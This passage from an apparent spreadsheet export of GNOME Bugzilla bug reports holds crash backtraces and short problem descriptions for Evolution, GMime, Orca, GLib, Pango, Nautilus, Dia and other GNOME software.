BugBuddy Version: 2.20.1
System: Linux 2.6.23-gentoo-r9 #1 SMP PREEMPT Tue Mar 4 12:02:45 EST 2008 i686
X Vendor: The X.Org Foundation
X Vendor Release: 10300000
Selinux: No
Accessibility: Disabled
GTK+ Theme: marble-look
Icon Theme: gnome
Memory status: size: 89645056 vsize: 89645056 resident: 32493568 share: 10186752 rss: 32493568 rss_rlim: 4294967295
CPU usage: start_time: 1205429640 rtime: 407 utime: 365 stime: 42 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/libexec/evolution-exchange-storage'
Using host libthread_db library /lib/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread 0xb61f26d0 (LWP 25154)]
[New Thread 0xb6023b90 (LWP 25155)]
0xb7f83410 in __kernel_vsyscall ()
#0  0xb7f83410 in __kernel_vsyscall ()
#1  0xb6856f9b in waitpid () from /lib/libpthread.so.0
#2  0xb6af0953 in IA__g_spawn_sync (working_directory=0x0 argv=0x89918f0 
    envp=0x0 flags=G_SPAWN_SEARCH_PATH child_setup=0 user_data=0x0 
    standard_output=0x0 standard_error=0x0 exit_status=0x0 error=0x80af4c8)
    at ../../../glib/glib/gspawn.c:374
#3  0xb6af0d56 in IA__g_spawn_command_line_sync (
    command_line=0x8a498a8 bug-buddy --appname=\evolution-exchange-storage\ --pid=25154 standard_output=0x0 standard_error=0x0 exit_status=0x0 
    error=0x80af4c8) at ../../../glib/glib/gspawn.c:682
#4  0xb7f76e9c in run_bug_buddy (appname= 
    pid= minidump_path=)
    at gnome-breakpad.cc:213
#5  0xb7f77372 in check_if_gdb (callback_context=0x0) at gnome-breakpad.cc:283
#6  0xb7f77628 in google_breakpad::ExceptionHandler::InternalWriteMinidump (
    this=0xb7f81340 signo=11 sighandler_ebp=134940984 sig_ctx=0x80b0924)
    at ../google-breakpad/src/client/linux/handler/exception_handler.cc:225
#7  0xb7f77ac0 in google_breakpad::ExceptionHandler::HandleException (
    signo=11)
    at ../google-breakpad/src/client/linux/handler/exception_handler.cc:196
#8  
#9  0xb6ad8155 in IA__g_str_hash (v=0x613c3e65)
    at ../../../glib/glib/gstring.c:95
#10 0xb6aa1a5b in g_hash_table_lookup_node (hash_table=0x80f13b8 
    key=0x613c3e65 hash_return=0x0) at ../../../glib/glib/ghash.c:118
#11 0xb6aa1a1a in IA__g_hash_table_lookup (hash_table=0x80f13b8 
    key=0x613c3e65) at ../../../glib/glib/ghash.c:659
#12 0x0805d765 in message_removed (stub=0x80ab108 mfld=0x83e7e38 
    href=0x613c3e65 )
    at ../../../evolution-exchange/mail/mail-stub-exchange.c:400
#13 0x0805f273 in sync_deletions (mse=0x80ab108 mfld=0x83e7e38)
    at ../../../evolution-exchange/mail/mail-stub-exchange.c:1203
#14 0x0805d3dd in folder_from_name (mse=0x80ab108 
    folder_name=0x89721e0 personal/Deleted Items perms=4 background=0)
    at ../../../evolution-exchange/mail/mail-stub-exchange.c:276
#15 0x0805fed7 in expunge_uids (stub=0x80ab108 
    folder_name=0x89721e0 personal/Deleted Items uids=0x8caa2d0)
    at ../../../evolution-exchange/mail/mail-stub-exchange.c:1547
#16 0x08065551 in connection_handler (source=0x8101960 condition=G_IO_IN 
    data=0x80ab108) at ../../../evolution-exchange/mail/mail-stub.c:187
#17 0xb6aef631 in g_io_unix_dispatch (source=0x81019b8 
    callback=0x80651b4  user_data=0x80ab108)
    at ../../../glib/glib/giounix.c:162
#18 0xb6ab1b42 in g_main_dispatch (context=0x80afe08)
    at ../../../glib/glib/gmain.c:2003
#19 0xb6ab300b in IA__g_main_context_dispatch (context=0x80afe08)
    at ../../../glib/glib/gmain.c:2555
#20 0xb6ab355f in g_main_context_iterate (context=0x80afe08 block=1 
    dispatch=1 self=0x808b100) at ../../../glib/glib/gmain.c:2636
#21 0xb6ab3d36 in IA__g_main_loop_run (loop=0x80cdfb8)
    at ../../../glib/glib/gmain.c:2844
#22 0xb6d327c9 in bonobo_main () at bonobo-main.c:311
#23 0x0805be46 in main (argc=3 argv=0xbf8323a4)
    at ../../../evolution-exchange/storage/main.c:238
Thread 2 (Thread 0xb6023b90 (LWP 25155)):
#0  0xb7f83410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb64f4c53 in *__GI___poll (fds=0xb6568ff4 nfds=11 timeout=-1)
    at ../sysdeps/unix/sysv/linux/poll.c:87
	resultvar = 
	oldtype = 0
	result = 
#2  0xb6ab4164 in g_main_context_poll (context=0x80ce978 timeout=-1 
    priority=2147483647 fds=0xb5604dc8 n_fds=11)
    at ../../../glib/glib/gmain.c:2945
	poll_func = (GPollFunc) 0xb64f4be0 
#3  0xb6ab352b in g_main_context_iterate (context=0x80ce978 block=1 
    dispatch=1 self=0x80cdbb8) at ../../../glib/glib/gmain.c:2631
	max_priority = 2147483647
	timeout = -1
	some_ready = 1
	nfds = 11
	allocated_nfds = 11
	fds = (GPollFD *) 0xb5604dc8
	__PRETTY_FUNCTION__ = g_main_context_iterate
#4  0xb6ab3d36 in IA__g_main_loop_run (loop=0x80b8258)
    at ../../../glib/glib/gmain.c:2844
	self = (GThread *) 0x80cdbb8
	__PRETTY_FUNCTION__ = IA__g_main_loop_run
#5  0xb6c20c43 in link_io_thread_fn (data=0x0) at linc.c:396
No locals.
#6  0xb6adfe82 in g_thread_create_proxy (data=0x80cdbb8)
    at ../../../glib/glib/gthread.c:635
	thread = (GRealThread *) 0x80cdbb8
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#7  0xb684f17b in start_thread (arg=0xb6023b90) at pthread_create.c:296
	__res = 
	__ignore1 = 
	__ignore2 = 
	pd = (struct pthread *) 0xb6023b90
	now = 
	unwind_buf = {cancel_jmp_buf = {{jmp_buf = {-1232740364 0 4001536 
        -1241369432 1936973053 2130103548} mask_was_saved = 0}} priv = {
    pad = {0x0 0x0 0x0 0x0} data = {prev = 0x0 cleanup = 0x0 
      canceltype = 0}}}
	not_first_call = 0
	robust = 
#8  0xb64fe04e in clone () from /lib/libc.so.6
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb6539070
Thread 1 (Thread 0xb61f26d0 (LWP 25154)):
#0  0xb7f83410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6856f9b in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#2  0xb6af0953 in IA__g_spawn_sync (working_directory=0x0 argv=0x89918f0 
    envp=0x0 flags=G_SPAWN_SEARCH_PATH child_setup=0 user_data=0x0 
    standard_output=0x0 standard_error=0x0 exit_status=0x0 error=0x80af4c8)
    at ../../../glib/glib/gspawn.c:374
	outpipe = -1
	errpipe = -1
	pid = 25596
	fds = {__fds_bits = {134935512 -1230165286 134789200 0 135233952 
    134935496 0 8 1 134789200 0 135233952 134935512 -1230265253 
    -1229619212 145004712 134935544 -1230159957 8 135123168 4 
    144899963 147497760 0 134935624 -1230171258 135123168 -1230265306 
    0 -1229619212 138609672 -1230264936}}
	ret = -1208492000
	outstr = (GString *) 0x0
	errstr = (GString *) 0x0
	failed = 0
	status = 135233952
	__PRETTY_FUNCTION__ = IA__g_spawn_sync
#3  0xb6af0d56 in IA__g_spawn_command_line_sync (
    command_line=0x8a498a8 bug-buddy --appname=\evolution-exchange-storage\ --pid=25154 standard_output=0x0 standard_error=0x0 exit_status=0x0 
    error=0x80af4c8) at ../../../glib/glib/gspawn.c:682
	retval = -1230041972
	argv = (gchar **) 0x89918f0
	__PRETTY_FUNCTION__ = IA__g_spawn_command_line_sync
#4  0xb7f76e9c in run_bug_buddy (appname= 
    pid= minidump_path=)
    at gnome-breakpad.cc:213
	exec_str = (
    gchar *) 0x8a498a8 bug-buddy --appname=\evolution-exchange-storage\ --pid=25154
	res = 
	error = (GError *) 0x0
#5  0xb7f77372 in check_if_gdb (callback_context=0x0) at gnome-breakpad.cc:283
	edata = 
	name = 0x8a898ed .debug_loc
	mypath = /opt/evo/libexec/evolution/2.22/evolution-exchange-storage '\0' 
	gdb = (gchar *) 0x8babcc8 /usr/bin/gdb
	appname = (gchar *) 0x8093780 evolution-exchange-storage
	pid = 25154
#6  0xb7f77628 in google_breakpad::ExceptionHandler::InternalWriteMinidump (
    this=0xb7f81340 signo=11 sighandler_ebp=134940984 sig_ctx=0x80b0924)
    at ../google-breakpad/src/client/linux/handler/exception_handler.cc:225
	guid = {data1 = 0 data2 = 2360 data3 = 2059 
  data4 = \000pÃ¹Â·\000\000\000}
	success = 
	guid_str = \000\001\000\000\000\001\000\000\000\000\000\000\000Q.Ã·Â·\000\020Ã·Â·0\002\001\000Ã'Ã·Â·Ã´\017Ã¸Â·@\023Ã¸Â·
#7  0xb7f77ac0 in google_breakpad::ExceptionHandler::HandleException (
    signo=11)
    at ../google-breakpad/src/client/linux/handler/exception_handler.cc:196
	current_ebp = 134940984
	current_handler = (google_breakpad::ExceptionHandler *) 0xb7f81340
	sig_ctx = (sigcontext *) 0x0
#8  
No symbol table info available.
#9  0xb6ad8155 in IA__g_str_hash (v=0x613c3e65)
    at ../../../glib/glib/gstring.c:95
	p = (
    const signed char *) 0x613c3e65 
	h = 2400804332
#10 0xb6aa1a5b in g_hash_table_lookup_node (hash_table=0x80f13b8 
    key=0x613c3e65 hash_return=0x0) at ../../../glib/glib/ghash.c:118
	node_ptr = (GHashNode **) 0x89f3cfc
	node = (GHashNode *) 0x0
	hash_value = 2400804332
#11 0xb6aa1a1a in IA__g_hash_table_lookup (hash_table=0x80f13b8 
    key=0x613c3e65) at ../../../glib/glib/ghash.c:659
	node = (GHashNode *) 0x0
	__PRETTY_FUNCTION__ = IA__g_hash_table_lookup
#12 0x0805d765 in message_removed (stub=0x80ab108 mfld=0x83e7e38 
    href=0x613c3e65 )
    at ../../../evolution-exchange/mail/mail-stub-exchange.c:400
	mmsg = (MailStubExchangeMessage *) 0x0
	index = 200
	__PRETTY_FUNCTION__ = message_removed
#13 0x0805f273 in sync_deletions (mse=0x80ab108 mfld=0x83e7e38)
    at ../../../evolution-exchange/mail/mail-stub-exchange.c:1203
	stub = (MailStub *) 0x80ab108
	status = 200
	results = (E2kResult *) 0x8babcc8
	nresults = 1
	prop = 0x89de470 Ã°8\237\b85\223\b\020
	deleted_count = 251895
	new_deleted_count = 251895
	visible_count = 176
	mode = 2
	rn = (E2kRestriction *) 0x8a49928
	iter = (E2kResultIter *) 0x8a30828
	result = (E2kResult *) 0x0
	my_i = 11
	read = 16
	highest_unverified_index = 1044
	highest_verified_seq = 12
	mmsg = (MailStubExchangeMessage *) 0x8c1e3f8
	my_mmsg = (MailStubExchangeMessage *) 0x83ff0b0
	changes = 1
#14 0x0805d3dd in folder_from_name (mse=0x80ab108 
    folder_name=0x89721e0 personal/Deleted Items perms=4 background=0)
    at ../../../evolution-exchange/mail/mail-stub-exchange.c:276
	mfld = (MailStubExchangeFolder *) 0x83e7e38
#15 0x0805fed7 in expunge_uids (stub=0x80ab108 
    folder_name=0x89721e0 personal/Deleted Items uids=0x8caa2d0)
    at ../../../evolution-exchange/mail/mail-stub-exchange.c:1547
	mse = (MailStubExchange *) 0x80ab108
	mfld = (MailStubExchangeFolder *) 0x80ab108
	mmsg = (MailStubExchangeMessage *) 0x1
	hrefs = (GPtrArray *) 0x1
	iter = (E2kResultIter *) 0x8101898
	result = (E2kResult *) 0x80fa940
	status = 135275912
	i = 1
	ndeleted = 1
	some_error = 0
#16 0x08065551 in connection_handler (source=0x8101960 condition=G_IO_IN 
    data=0x80ab108) at ../../../evolution-exchange/mail/mail-stub.c:187
	folder_name = 0x89721e0 personal/Deleted Items
	uids = (GPtrArray *) 0x8caa2d0
	stub = (MailStub *) 0x80ab108
	command = 5
#17 0xb6aef631 in g_io_unix_dispatch (source=0x81019b8 
    callback=0x80651b4  user_data=0x80ab108)
    at ../../../glib/glib/giounix.c:162
	func = (GIOFunc) 0x80651b4 
	watch = (GIOUnixWatch *) 0x81019b8
	buffer_condition = 0
#18 0xb6ab1b42 in g_main_dispatch (context=0x80afe08)
    at ../../../glib/glib/gmain.c:2003
	dispatch = (gboolean (*)(GSource * GSourceFunc 
    gpointer)) 0xb6aef5a6 
	was_in_call = 0
	user_data = (gpointer) 0x80ab108
	callback = (GSourceFunc) 0x80651b4 
	cb_funcs = (GSourceCallbackFuncs *) 0xb6b582fc
	cb_data = (gpointer) 0x8101a00
	need_destroy = -1229619212
	current_source_link = {data = 0x81019b8 next = 0x0}
	source = (GSource *) 0x81019b8
	current = (GMainDispatch *) 0x80b5638
	i = 0
	__PRETTY_FUNCTION__ = g_main_dispatch
#19 0xb6ab300b in IA__g_main_context_dispatch (context=0x80afe08)
    at ../../../glib/glib/gmain.c:2555
No locals.
#20 0xb6ab355f in g_main_context_iterate (context=0x80afe08 block=1 
    dispatch=1 self=0x808b100) at ../../../glib/glib/gmain.c:2636
	max_priority = 2147483647
	timeout = 1000
	some_ready = 1
	nfds = 7
	allocated_nfds = 9
	fds = (GPollFD *) 0x81864c8
	__PRETTY_FUNCTION__ = g_main_context_iterate
#21 0xb6ab3d36 in IA__g_main_loop_run (loop=0x80cdfb8)
    at ../../../glib/glib/gmain.c:2844
	self = (GThread *) 0x808b100
	__PRETTY_FUNCTION__ = IA__g_main_loop_run
#22 0xb6d327c9 in bonobo_main () at bonobo-main.c:311
	loop = (GMainLoop *) 0x80cdfb8
#23 0x0805be46 in main (argc=3 argv=0xbf8323a4)
    at ../../../evolution-exchange/storage/main.c:238
	path = 0x80c9ab8 ExchangeConfigListener
	config_directory = 0x80cabd8 \030s\v\bÃ°\t\b -\t\b\001
#0  0xb7f83410 in __kernel_vsyscall ()
The program is running.  Quit anyway (and detach it)? (y or n) [answered Y input not from terminal]
----------- .xsession-errors (98 sec old) ---------------------
** (nautilus-sendto:25145): CRITICAL **: view_completed_cb: assertion `status == E_BOOK_ERROR_OK' failed
** (nautilus-sendto:25145): CRITICAL **: view_completed_cb: assertion `status == E_BOOK_ERROR_OK' failed
** (nautilus-sendto:25145): CRITICAL **: view_completed_cb: assertion `status == E_BOOK_ERROR_OK' failed
** (nautilus-sendto:25145): CRITICAL **: view_completed_cb: assertion `status == E_BOOK_ERROR_OK' failed
** (nautilus-sendto:25145): CRITICAL **: view_completed_cb: assertion `status == E_BOOK_ERROR_OK' failed
** (nautilus-sendto:25145): CRITICAL **: view_completed_cb: assertion `status == E_BOOK_ERROR_OK' failed
** (nautilus-sendto:25145): CRITICAL **: view_completed_cb: assertion `status == E_BOOK_ERROR_OK' failed
...Too much output ignoring rest...
--------------------------------------------------</t>
  </si>
  <si>
    <t>connector-maintainers</t>
  </si>
  <si>
    <t>jreidthompson</t>
  </si>
  <si>
    <t>GMIME-502003</t>
  </si>
  <si>
    <t>GMIME</t>
  </si>
  <si>
    <t>fails to parse email (infinite loop)</t>
  </si>
  <si>
    <t>Please describe the problem:
The header decoder loops in Debian's libgmime 2.2.10 (didn't in 2.2.3) when it hits the malformed
Subject: =??Q??=
The problem goes away when there is a character between the first and second question mark.
Debian Bug with testcase: http://bugs.debian.org/454536
Steps to reproduce:
1. get stuff from http://bugs.debian.org/454536
2. compile testcase.c
3. run with testcase.mbox
Actual results:
Function call does not return.
Expected results:
It should return.
Does this happen every time?
Yes
Other information:
I could say something about bugzilla forms here.</t>
  </si>
  <si>
    <t>tv+bugzilla.gnome.org</t>
  </si>
  <si>
    <t>ORCA-348975</t>
  </si>
  <si>
    <t>speech</t>
  </si>
  <si>
    <t>orca should not speak the role when moving between radio buttons</t>
  </si>
  <si>
    <t>Please describe the problem:
After tabbing to a radio button group orca speaks the role when changing the selected button
Steps to reproduce:
1. Open the edit current profile dialog in gnome-terminal
2. navigate to any of the radio button groups
3. arrow between the radio buttons
Actual results:
Radio button is spoken each time the selected button is changed
Expected results:
You should just hear the new button
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>michael.pedersen</t>
  </si>
  <si>
    <t>GDK-PIXBUF-61179</t>
  </si>
  <si>
    <t>merge gdk-pixbuf changes from stable</t>
  </si>
  <si>
    <t>add this one per Federico's request
one thing to be merged is the 32 bit ico support there are probably others</t>
  </si>
  <si>
    <t>yaneti</t>
  </si>
  <si>
    <t>GCONF-EDITOR-341344</t>
  </si>
  <si>
    <t>gconf-editor's autogen.sh does not run intltoolize</t>
  </si>
  <si>
    <t>using jhbuild on a Fedora Core 5 and building Gnome 2.14 the following error is produced
checking for intltool &gt;= 0.34.90... awk: cmd. line:1: fatal: cannot open file `./intltool-update.in' for reading (No such file or directory)
awk: cmd. line:1: fatal: cannot open file `./intltool-update.in' for reading (No such file or directory)
 found
./configure: line 2028: test: : integer expression expected
configure: error: Your intltool is too old.  You need intltool 0.34.90 or later
I'm not sure if there is any intltool 0.34.90.
FC5's most recent update puts intltool at 0.34.2</t>
  </si>
  <si>
    <t>sobhi</t>
  </si>
  <si>
    <t>EKIGA-498082</t>
  </si>
  <si>
    <t>PTLIB</t>
  </si>
  <si>
    <t>Performance Issue in MJPEG-to-YUV420P Convertor</t>
  </si>
  <si>
    <t>IDCT transform consumes the most cpu time especially when CIF size enabled. Using Medialib can accelerate the phase taking advantage of VIS/SSE set under OpenSolaris.</t>
  </si>
  <si>
    <t>elaine.xiong</t>
  </si>
  <si>
    <t>GLIB-337128</t>
  </si>
  <si>
    <t>Macro expansion problems calling G_DEFINE_TYPE_EXTENDED</t>
  </si>
  <si>
    <t>Currently the different G_DEFINE_TYPE macros call G_DEFINE_TYPE_EXTENDED:
#define G_DEFINE_TYPE(TN t_n T_P)                         G_DEFINE_TYPE_EXTENDED (TN t_n T_P 0 {})
#define G_DEFINE_TYPE_WITH_CODE(TN t_n T_P _C_)          G_DEFINE_TYPE_EXTENDED (TN t_n T_P 0 _C_)
#define G_DEFINE_ABSTRACT_TYPE(TN t_n T_P)                G_DEFINE_TYPE_EXTENDED (TN t_n T_P G_TYPE_FLAG_ABSTRACT {})
#define G_DEFINE_ABSTRACT_TYPE_WITH_CODE(TN t_n T_P _C_) G_DEFINE_TYPE_EXTENDED (TN t_n T_P G_TYPE_FLAG_ABSTRACT _C_)
This is problematic though as _C_ is expanded before passing to G_DEFINE_TYPE_EXTENDED causing compile errors if the code passed in contains any comma tokens!
This can be fixed easily by breaking G_DEFINE_TYPE_EXTENDED into two parts one before the code and one after and make _WITH_CODE macros call them and expand _C_ themselves.</t>
  </si>
  <si>
    <t>GNOME-POWER-MANAGER-336081</t>
  </si>
  <si>
    <t>DPMS state lost after suspend</t>
  </si>
  <si>
    <t>This looks a lot like an X regression but the work around seems non-harmful.
After resuming from suspend it would be nice to reset the DPMS state that was set in the power management preferences. It would seem to occasionally go missing requiring something like an 'xset dpms 0 0 300' to reenable.</t>
  </si>
  <si>
    <t>PANGO-347021</t>
  </si>
  <si>
    <t>[patch] atsui crash when a matching font cannot be found</t>
  </si>
  <si>
    <t>Using the MacOS X atsui backend pango_atsui_font_map_load_font() does not check to make sure it actually found a suitable font before dereferencing a possibly-NULL PangoFontDescription.  This causes for example the current gaim2 beta to crash when opening the preferences dialog (in this case looking for an oblique variant that apparently doesn't exist).
As far as I can tell simply returning NULL is safe as the caller does check for NULL before adding the font to the list and the caller of the caller finds a fallback on its own.
Stack trace from CrashReporter:
0   libpangocairo-1.0.0.dylib   0x006b5004 pango_atsui_font_map_load_font + 320 (pangoatsui-fontmap.c:581)
1   libpango-1.0.0.dylib        0x01ab7e5c pango_font_map_fontset_add_fonts + 172 (pango-fontmap.c:140)
2   libpango-1.0.0.dylib        0x01ab7f10 pango_font_map_real_load_fontset + 128 (pango-fontmap.c:161)
3   libpango-1.0.0.dylib        0x01ab61d8 itemize_state_process_run + 348 (pango-context.c:1045)
4   libpango-1.0.0.dylib        0x01ab6730 pango_itemize_with_base_dir + 280 (pango-context.c:1190)
5   libpango-1.0.0.dylib        0x01abe7d4 pango_layout_check_lines + 740 (pango-layout.c:3124)
6   libpango-1.0.0.dylib        0x01abefb8 pango_layout_get_extents_internal + 88 (pango-layout.c:2084)
7   libgtk-quartz-2.0.0.dylib   0x010d7468 gtk_label_size_request + 884 (gtklabel.c:2119)
[etc...]</t>
  </si>
  <si>
    <t>BALSA-109665</t>
  </si>
  <si>
    <t>Pasting email or subject into email places text in body</t>
  </si>
  <si>
    <t xml:space="preserve">Package: balsa
Severity: normal
Version: 2.0.10
Synopsis: Pasting email or subject into email places text in body
Bugzilla-Product: balsa
Bugzilla-Component: general
Description:
Description of Problem:
If you copy an email from a web page say and try to paste it into the
To field of a new email the text ends up in the body of the email. Same
goes for the subject body
Steps to reproduce the problem:
1. Place email address on the clipboard
2. Open a new email
3. Paste it into the To field
Actual Results:
Email address gets placed in the body of the email
Expected Results:
Email address gets placed in the selected field (To field or CC field)
How often does this happen?
Every time
Additional Information:
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-04-01 00:26 -------
Reassigning to the default owner of the component pawsa@theochem.kth.se.
</t>
  </si>
  <si>
    <t>nigel.sim</t>
  </si>
  <si>
    <t>BLUEFISH-385987</t>
  </si>
  <si>
    <t>bluefish shouldn't use uninitialized GnomeVFSFileInfo</t>
  </si>
  <si>
    <t>while debugging a bluefish crash I found that the crash was in gnome_vfs. The crash can only be reproduced over sftp. So it seems that the crash is in the sftp module. This is the backtrace:
(gdb) bt
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb739f770 in raise () from /lib/tls/i686/cmov/libc.so.6
#2  0xb73a0ef3 in abort () from /lib/tls/i686/cmov/libc.so.6
#3  0xb73d4d0b in __fsetlocking () from /lib/tls/i686/cmov/libc.so.6
#4  0xb73dcb4a in free () from /lib/tls/i686/cmov/libc.so.6
#5  0xb7527b51 in g_free () from /usr/lib/libglib-2.0.so.0
#6  0xb6e74769 in update_mime_type_and_name_from_path (file_info=0xb73d6f8e 
    path=0x16  options=9) at sftp-method.c:2428
#7  0xb6e74935 in get_file_info_for_path (conn=0x87c8288 
    path=0x87d97b0 /home/olivier/bluefish/tmp/test1.html file_info=0xbff79e80 
    options=) at sftp-method.c:2598
#8  0xb6e74c24 in do_get_file_info (method=0xb6e76a00 uri=0x874c868 file_info=0xbff79e80 
    options=9 context=0x0) at sftp-method.c:2622
#9  0xb76a23fa in gnome_vfs_get_file_info_uri_cancellable (uri=0x874c868 info=0xbff79e80 
    options=9 context=0x0) at gnome-vfs-cancellable-ops.c:202
#10 0xb76b9bf3 in gnome_vfs_get_file_info_uri (uri=0x874c868 info=0xbff79e80 options=9)
    at gnome-vfs-ops.c:332
#11 0x080806d6 in get_mimetype_for_uri (uri=0x874c868 fast=0) at filetype.c:147
This is with bluefish unstable (cvs head) on Ubuntu 6.10</t>
  </si>
  <si>
    <t>GNOME-TERMINAL-337904</t>
  </si>
  <si>
    <t>Use po/LINGUAS</t>
  </si>
  <si>
    <t>http://live.gnome.org/GnomeGoals/PoLinguas
Here is a patch to use po/LINGUAS file</t>
  </si>
  <si>
    <t>pgrzegorczyk</t>
  </si>
  <si>
    <t>GNOME-THEMES-104297</t>
  </si>
  <si>
    <t>icon-themes catalog is missed in Makefile.in</t>
  </si>
  <si>
    <t>Icon themes from icon-themes catalog are not installed</t>
  </si>
  <si>
    <t>TOTEM-154952</t>
  </si>
  <si>
    <t>0.99.17 fails to build</t>
  </si>
  <si>
    <t>against gstreamer-0.8.7 and gst-plugins-0.8.5
make[3]: *** No rule to make target `gstvideowidget.h' needed by
`bacon-video-widget-gst.o'.  Stop</t>
  </si>
  <si>
    <t>gardner.biggs</t>
  </si>
  <si>
    <t>NAUTILUS-48438</t>
  </si>
  <si>
    <t>Desktop</t>
  </si>
  <si>
    <t>changing desktop between $HOME and .gnome-desktop breaks desktop DnD from other apps</t>
  </si>
  <si>
    <t xml:space="preserve">If the desktop is changed from using .gnome-desktop to $HOME (or vice versa)
dragging launchers from the panel and other apps (eg URL from Galeon) puts the
new file into the old desktop directory until Nautilus is restarted. Once
Nautilus is restarted the correct desktop directory is used.
* REPRODUCIBLE: Always
* STEPS TO REPRODUCE:
1. Change the desktop to use $HOME if Nautilus started with .gnome-desktop or
.gnome-desktop if it started with $HOME.
2. Drag a launcher from the panel.
3. Nautilus link is created in the directory Nautilus was using as the desktop
when it started not what it's currently set to.
------- Additional Comments From darin@bentspoon.com 2001-07-27 10:22:45 ----
This bug was introduced by Miguel's optimization to keep the desktop
directory in a global variable. I'll fix it.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:18 -------
The original reporter (gamera@optushome.com.au) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>gamera</t>
  </si>
  <si>
    <t>NAUTILUS-94986</t>
  </si>
  <si>
    <t>delete key in rename moves file to trash</t>
  </si>
  <si>
    <t>When editing a file name if the delete key is used the file is moved to
the trash rather than the character being deleted.</t>
  </si>
  <si>
    <t>ORCA-364529</t>
  </si>
  <si>
    <t>Allow voice styles (e.g. link voice) to be undefined</t>
  </si>
  <si>
    <t>Some users do not want some voice styles such as the upper case and link voices.  As a means to help do this we should consider allowing these voices styles to not even be defined at all in settings and then behave appropriately (i.e. fallback to the default voice) in the various places where they are used.</t>
  </si>
  <si>
    <t>DIA-159080</t>
  </si>
  <si>
    <t>crash on quit possibly due to group properties dialog</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian 3.1
Package: dia
Severity: normal
Version: GNOME2.6.1 unspecified
Gnome-Distributor: Debian
Synopsis: crash on quit possibly due to group properties dialog 
Bugzilla-Product: dia
Bugzilla-Component: general
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.6.1.1)
Description:
Description of the crash:
I had Dia open including having a the Group Properties dialog open.  
I quit Dia and all but Group Properties dialog disappeared
I hit Ok to dismiss the dialog and Dia crashed.  
Debugging Information:
Backtrace was generated from '/usr/bin/dia-gnome'
(no debugging symbols found)...Using host libthread_db library
/lib/libthread_db.so.1.
(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Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 4493)]
(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no debugging symbols
found)...0x40b1abe8 in waitpid () from /lib/libpthread.so.0
#0  0x40b1abe8 in waitpid () from /lib/libpthread.so.0
#1  0x401ab7fc in ?? () from /usr/lib/libgnomeui-2.so.0
#2  0x40168f48 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#3  0x40b19825 in __pthread_sighandler () from /lib/libpthread.so.0
#4  
#5  0x4002f1d7 in data_get_sorted_selected () from
/usr/lib/dia/libdia.so
#6  0x4103256f in PyDiaDiagram_New () from
/usr/lib/dia/libpython_plugin.so
#7  0x4109b88d in PyCFunction_Call () from /usr/lib/libpython2.3.so.1.0
#8  0x410d1012 in PyEval_GetFuncDesc () from
/usr/lib/libpython2.3.so.1.0
#9  0x410cedb1 in PyEval_EvalCode () from /usr/lib/libpython2.3.so.1.0
#10 0x410cf99c in PyEval_EvalCodeEx () from
/usr/lib/libpython2.3.so.1.0
#11 0x4108b73a in PyStaticMethod_New () from
/usr/lib/libpython2.3.so.1.0
#12 0x41073e77 in PyObject_Call () from /usr/lib/libpython2.3.so.1.0
#13 0x4107cedb in PyMethod_Fini () from /usr/lib/libpython2.3.so.1.0
#14 0x41073e77 in PyObject_Call () from /usr/lib/libpython2.3.so.1.0
#15 0x410d0c8a in PyEval_CallObjectWithKeywords ()
   from /usr/lib/libpython2.3.so.1.0
#16 0x41073e2c in PyObject_CallObject () from
/usr/lib/libpython2.3.so.1.0
#17 0x412283e6 in initgobject ()
   from /usr/lib/python2.3/site-packages/gtk-2.0/gobject.so
#18 0x40ad0c20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#19 0x40ae4c25 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#20 0x40ae3be7 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#21 0x40ae3ee4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#22 0x404292b5 in gtk_button_clicked () from
/usr/lib/libgtk-x11-2.0.so.0
#23 0x4042a2cb in _gtk_button_paint () from
/usr/lib/libgtk-x11-2.0.so.0
#24 0x40ae5121 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#25 0x40ad0fb7 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#26 0x40ad0c20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#27 0x40ae444e in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#28 0x40ae3be7 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#29 0x40ae3ee4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#30 0x40429205 in gtk_button_released () from
/usr/lib/libgtk-x11-2.0.so.0
#31 0x4042a14b in _gtk_button_paint () from
/usr/lib/libgtk-x11-2.0.so.0
#32 0x404e69f4 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#33 0x40ad0fb7 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#34 0x40ad0c20 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#35 0x40ae4655 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#36 0x40ae39be in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#37 0x40ae3ee4 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#38 0x405e58e7 in gtk_widget_send_expose () from
